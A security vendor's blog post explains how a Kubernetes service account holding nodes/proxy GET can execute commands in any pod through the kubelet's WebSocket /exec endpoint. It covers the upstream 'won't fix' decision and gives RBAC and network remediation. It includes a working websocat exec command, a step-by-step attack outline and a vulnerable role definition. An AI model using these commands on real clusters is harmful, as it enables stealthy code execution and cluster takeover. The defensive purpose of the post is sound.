Written by Daniel Limanowski and Adam Brown, Senior Attack Engineers at Horizon3.ai.
Kubernetes was supposed to make running containers at scale boring. Instead, it turned “just give the monitoring agent read-only access” into a stealthy path to execute code in every pod on a node, and in many clusters, that effectively means “own everything.”
In this post we’ll walk through the Kubernetes (K8s) nodes/proxy GET remote code execution (RCE) technique originally detailed by security researcher Graham Helton, explain why K8s maintainers have effectively classified it as “working as intended,” and show how we’ve built full coverage for it into the NodeZero® Kubernetes Pentest so you can see exactly which service accounts in your clusters can be turned into shells.
We’ll close with concrete remediation guidance, including how to use KEP‑2862 and vendor RBAC updates to start digging out of this hole even though the underlying behavior is here to stay.
Kubernetes is an orchestration layer for containers. It schedules pods onto nodes, keeps them running, and exposes APIs for managing workloads, networking, and storage.
Each node runs a kubelet process that actually talks to the container runtime. The kubelet exposes its own HTTP(S) API for metrics, logs, and control operations like /exec and /run. Access to that API is gated by Kubernetes Role-Based Access Control (RBAC), usually via higher‑level resources like nodes/proxy that sit in front of the kubelet.
In theory, you give “read‑only” service accounts just enough access to pull metrics and logs. In practice, for nodes/proxy, “read‑only” is doing a lot of work.
## nodes/proxy GET to RCE on Any Pod

Research shows that a service account with the nodes/proxy GET permission and network access to the kubelet API can execute arbitrary commands in any pod on reachable nodes (including privileged system pods and control plane workloads) by abusing how the kubelet authorizes WebSocket connections to /exec.
Cluster admins and vendors commonly grant nodes/proxy GET so that agents can:

- scrape metrics from endpoints like /metrics and /metrics/cadvisor
- pull resource statistics from /stats/summary
- read node logs and health endpoints
These interactions look and feel like classic read-only operations. Vendors ship the permissions in Helm charts by default: public code repository scans turned up at least 69 widely used charts that provision nodes/proxy permissions, including stacks like Prometheus, Grafana, Datadog, and Elastic.
That’s rather unsurprising as “read” roles are everywhere, especially with monitoring tools. The problem is what happens when you combine nodes/proxy GET with WebSockets and the kubelet’s /exec endpoint.
At a high level, the attack looks like this:
1. Obtain a token for a service account that holds the nodes/proxy GET permission.
2. Reach the kubelet API directly at https://$NODE_IP:10250.
3. Enumerate the pods and containers on the node via /pods.
4. Open a WebSocket connection to /exec on the kubelet and bypass the expected CREATE verb check.

The key bug is how the kubelet translates HTTP/WebSocket semantics into RBAC verbs for authorization.
The nodes/proxy resource is unusual in Kubernetes RBAC. Instead of mapping to a single operation, it’s a catch‑all gate in front of the kubelet API, with two main paths:
- Through the API server proxy: https://$APISERVER/api/v1/nodes/$NODE_NAME/proxy/...
- Directly against the kubelet: https://$NODE_IP:10250/... Direct requests never generate pods/exec audit logs (only subjectaccessreviews), and rely on the kubelet's own authz mapping.

For traditional HTTP requests, both the API server and kubelet follow the documented mapping of HTTP methods to RBAC verbs: POST → create, GET → get, etc.
Command execution in pods is supposed to require CREATE on pods/exec (or, in this case, nodes/proxy). A POST to /exec via the API server proxy path is correctly mapped to CREATE and denied if the caller only has GET:
```bash
curl -sk -X POST \
  -H "Authorization: Bearer $TOKEN" \
  "$APISERVER/api/v1/nodes/$NODE_NAME/proxy/exec/default/nginx/nginx?command=id&stdout=true"
# => 403 Forbidden: cannot create resource "nodes/proxy"
```
But interactive exec over WebSockets works differently:
- The client sends a GET request with Connection: Upgrade headers to establish the tunnel, even though the underlying operation is a write (command execution).
- The kubelet authorizes the request based on the HTTP method, GET → get, and maps the path /exec/ to the proxy subresource, yielding an authz record of "can this user get nodes/proxy?".
- Because the service account holds nodes/proxy GET, the authorization check passes.

At that point, the attacker can execute any command over the WebSocket in the target container:
```bash
websocat \
  --insecure \
  --header "Authorization: Bearer $TOKEN" \
  --protocol "v4.channel.k8s.io" \
  "wss://$NODE_IP:10250/exec/default/nginx/nginx?output=1&error=1&command=id"
# uid=0(root) gid=0(wheel) groups=0(wheel)...
# {"metadata":{},"status":"Success"}
```
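The gap between the two paths boils down to a verb-mapping quirk. The sketch below is a deliberate simplification of the kubelet's authorizer behavior as described above, not its actual source code:

```shell
# Simplified model of how the kubelet turns an incoming request into an RBAC
# verb check. This mirrors the behavior described in the post; it is NOT
# actual kubelet code.
kubelet_rbac_verb() {
  method="$1"; upgrade="$2"
  # WebSocket upgrades always arrive as GET, so the kubelet authorizes them
  # with the "get" verb -- even when the tunneled operation (exec) is a write.
  if [ "$upgrade" = "websocket" ]; then
    echo "get"
    return
  fi
  case "$method" in
    POST)   echo "create" ;;
    GET)    echo "get" ;;
    PUT)    echo "update" ;;
    DELETE) echo "delete" ;;
  esac
}

kubelet_rbac_verb POST ""          # plain POST to /exec -> "create" (denied with only get)
kubelet_rbac_verb GET "websocket"  # WebSocket /exec     -> "get"    (passes!)
```

A caller holding only the get verb is rejected on the first path and accepted on the second, even though both paths end in command execution.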
nodes/proxy GET is widely granted to monitoring, logging, and observability agents: Prometheus, Datadog, Grafana, OpenTelemetry, New Relic, Wiz, and many others.
- If an attacker can reach a kubelet on port 10250 and has nodes/proxy GET, they can execute code in any pod on that node, including control plane components and privileged system pods like kube-proxy, leading to full cluster compromise.
- Direct kubelet /exec operations do NOT show up as pods/exec in audit logs; you only see the subjectaccessreviews checks, which makes this significantly stealthier than the API-server proxy path.

This is the kind of "read‑only" permission that attackers quietly celebrate and infrastructure teams inherit for years to come.
Researcher Graham Helton reported this issue through the Kubernetes HackerOne program. The Kubernetes Security Team triaged it, discussed it with SIG‑Auth and SIG‑Node, and ultimately closed it as:
“Won’t Fix (Working as Intended)” and decided it would not receive a CVE.
Their reasoning: nodes/proxy is a deliberately coarse permission in front of the kubelet API, and the path forward is the finer‑grained subresources of KEP‑2862 rather than changing the existing authorization behavior.
KEP‑2862 introduces new, finer‑grained kubelet subresources like:
| Permission | Endpoints (examples) | Use case |
|---|---|---|
| nodes/metrics | /metrics, /metrics/cadvisor, /metrics/… | Metrics collection |
| nodes/stats | /stats, /stats/summary | Resource statistics |
| nodes/log | /logs/ | Node logs |
| nodes/healthz | /healthz, /healthz/ping, /healthz/syncloop | Health checks |
| nodes/pods | /pods, /runningpods | Pod listing/status |
The goal is to give monitoring agents an alternative to the coarse‑grained nodes/proxy permission, so that over time, nodes/proxy can be deprecated for those use cases.
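Assuming the KEP‑2862 subresources are available in your cluster version, a monitoring agent's role could drop nodes/proxy in favor of the narrower grants from the table above (the role name here is illustrative):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: monitoring-agent-kubelet-reader   # illustrative name
rules:
- apiGroups: [""]
  # Fine-grained kubelet subresources instead of the catch-all nodes/proxy
  resources: ["nodes/metrics", "nodes/stats", "nodes/log"]
  verbs: ["get"]
```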
But there are three important caveats:
1. KEP‑2862 is not yet generally available, so most clusters cannot rely on it today.
2. The new subresources do not cover /exec, /run, /attach, or /portforward. Any workload that legitimately needs those still has to use nodes/proxy.
3. Even where the new subresources are adopted, the underlying WebSocket authorization behavior of nodes/proxy GET remains.

The Kubernetes Security Team is candid about this: they see KEP‑2862 as the way to render nodes/proxy obsolete for monitoring agents, not as a fix for the underlying authz behavior.
In summary, nodes/proxy GET with kubelet access is going to be a dangerous combination for the foreseeable future. The only realistic mitigation path is to restrict usage of nodes/proxy for read‑only use cases.
## Finding nodes/proxy GET in Your Cluster

From an attacker's perspective, the bar is low. To exploit this behavior, they need:
1. A service account with nodes/proxy GET

A minimal vulnerable Role/ClusterRole looks like:
```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: nodes-proxy-reader
rules:
- apiGroups: [""]
  resources: ["nodes/proxy"]
  verbs: ["get"]
```
Any service account bound to this role is in scope.
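Finding every role like this in your own cluster is the first remediation step. A rough offline scan over dumped RBAC manifests might look like the sketch below; the sample manifest and the line-oriented awk matching are simplifying assumptions, not a real YAML parser:

```shell
# Flag roles that grant "get" on nodes/proxy in a dumped RBAC manifest.
# A role is flagged when one of its rules names nodes/proxy and the get verb.
flag_nodes_proxy_get() {
  awk '
    /name:/         { role = $2 }
    /nodes\/proxy/  { risky = 1 }
    /verbs:.*get/   { if (risky) print role; risky = 0 }
  ' "$1"
}

# Self-contained sample input standing in for real cluster output.
cat > /tmp/roles.yaml <<'EOF'
- kind: ClusterRole
  metadata:
    name: nodes-proxy-reader
  rules:
  - apiGroups: [""]
    resources: ["nodes/proxy"]
    verbs: ["get"]
- kind: ClusterRole
  metadata:
    name: pod-reader
  rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["get", "list"]
EOF

flag_nodes_proxy_get /tmp/roles.yaml   # prints: nodes-proxy-reader
```

In practice you would generate the input with kubectl get clusterroles,roles -A -o yaml and treat hits as candidates for manual review, e.g. with kubectl auth can-i.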
2. Network access to the kubelet at https://$NODE_IP:10250

A kubeconfig committed to Git, SSRF into a pod, or command injection in an app container can turn into an attacker running commands as the service account. From there, they:
- Query /pods on the kubelet to enumerate all pods and containers on the node.
- Hit /exec/$NAMESPACE/$POD/$CONTAINER?...&command=... and run arbitrary commands across pods.
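Concretely, those two steps touch just two kubelet endpoints. The snippet below only assembles the URLs (every value is a placeholder) so you can see the shape of the requests:

```shell
# Placeholder values -- in a real engagement these come from enumeration.
NODE_IP="10.0.0.5"
NS="kube-system"; POD="kube-proxy-abc12"; CONTAINER="kube-proxy"

# Step 1: list every pod on the node (a plain GET, authorized by nodes/proxy get).
pods_url="https://${NODE_IP}:10250/pods"

# Step 2: exec into any discovered container over WebSockets (still checked as get).
exec_url="wss://${NODE_IP}:10250/exec/${NS}/${POD}/${CONTAINER}?output=1&error=1&command=id"

echo "$pods_url"
echo "$exec_url"
```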
NodeZero can now find and exploit nodes/proxy GET autonomously.

## Turning nodes/proxy GET into a First-Class Weakness

We are introducing this vulnerability as a new first‑class weakness in NodeZero's Kubernetes Pentest operation, tracked as H3‑2026‑0002.
At a high level, this allows NodeZero to automatically find, safely exploit, and report this weakness if it appears in your cluster.
NodeZero tests nodes/proxy GET exploitability leveraging credentials it finds in the pentest environment. From a user's perspective, this behavior is now just part of a normal Kubernetes Pentest.
Our Kubernetes documentation already recommends that you use the pentest to simulate realistic footholds, not just a privileged admin account:
Under Kubernetes Settings for a Kubernetes Pentest, you can specify a namespace and a service account.
Example scenarios:

- Run the pentest as the service account of a monitoring or logging agent to see what that "read‑only" identity can really do.
- Run the pentest from an application namespace to simulate a compromised workload.
In both scenarios, the new nodes/proxy GET RCE module gives you a clear answer to:
“If an attacker compromises this pod or service account, how far can they push kubelet?”
Beyond the initial foothold identity, our Kubernetes pentest already does quite a bit with service accounts:
All of those identities flow into the graph as credentials, triggering the nodes/proxy GET RCE check to test for vulnerable permissions.
Because Kubernetes maintainers are not planning to patch this behavior directly, security teams have to treat nodes/proxy GET as a high‑risk execution capability and harden around it.
KEP-2862 won’t reach GA until April 2026 at the earliest, so keep an eye on it and upgrade clusters when you can. Until then, here’s a set of actions you can take today:
### Remove Unneeded nodes/proxy GET

The priority is to remove the privileged nodes/proxy GET permission from any service account that doesn’t strictly need full Kubelet API access.
- Enumerate every ClusterRole or Role that grants get verbs on the nodes/proxy resource.
- Where possible, replace nodes/proxy with narrower grants, and avoid nodes/proxy for multi-purpose operational accounts that hold other sensitive rights.
- Add admission or policy controls that detect new bindings (ClusterRole or Role) that grant nodes/proxy permissions to unauthorized subjects. This prevents accidental re-introduction of the vulnerability.

### Restrict Network Access to the Kubelet

RBAC is necessary but not sufficient. Restrict network access to the Kubelet API as a critical second line of defense.
- Block direct pod access to https://$NODE_IP:10250 using Network Policies, cloud firewalls, or other network controls.
- Allow only system components that genuinely need the kubelet API to reach port 10250.
- Tight segmentation limits the blast radius even if an identity picks up nodes/proxy GET in the future.
- Alert on connections to port 10250 originating from application or non-system namespaces.

As researcher Helton notes, this weakness feels a lot like Kerberoasting in Active Directory: architecturally “by design,” widely deployed, and abusable for years.
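One concrete way to enforce the network restriction above: since NetworkPolicy has no "deny this port" primitive, use a default-deny-style egress allowlist so pods can reach only the ports they need and never 10250. The namespace and port choices below are illustrative assumptions, not a drop-in policy:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-app-egress     # illustrative name
  namespace: app-namespace      # illustrative namespace
spec:
  podSelector: {}               # applies to every pod in the namespace
  policyTypes:
  - Egress
  egress:
  - ports:                      # only DNS and HTTPS are allowed out;
    - protocol: UDP             # kubelet port 10250 is implicitly denied
      port: 53
    - protocol: TCP
      port: 443
```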
Even with careful RBAC and eventual KEP‑2862 adoption, new clusters, namespaces, and agents get added all the time. You need something that continuously exercises these paths the way an adversary would, not just a static policy document.
That’s exactly what we’ve built into NodeZero’s Kubernetes Pentest: a recurring, cluster‑wide, attacker‑style assessment of Kubelet and RBAC behavior, including this nodes/proxy GET RCE.
If your Kubernetes environment:
- grants any service account the nodes/proxy GET permission, and
- lets workloads reach kubelets on port 10250,

…then you should assume this weakness is in play until you’ve proven otherwise.
With our latest update, NodeZero’s Kubernetes Pentest can automatically:
- Discover service accounts holding the nodes/proxy GET permission
- Safely exercise the WebSocket /exec path against the kubelet
- Report the nodes/proxy GET weakness if found exploitable in your environment, including actionable remediation recommendations.

If you’re responsible for Kubernetes security, this is one of those “trust but verify” moments.
Run a NodeZero Kubernetes Pentest against your clusters, ideally from the same namespaces and service accounts your monitoring agents use, and find out which of your “read‑only” identities can actually run code across pods. Then use the remediation steps above to start turning those paths off before an attacker finds them for you.
If you’re interested in seeing a demo, you can request one here.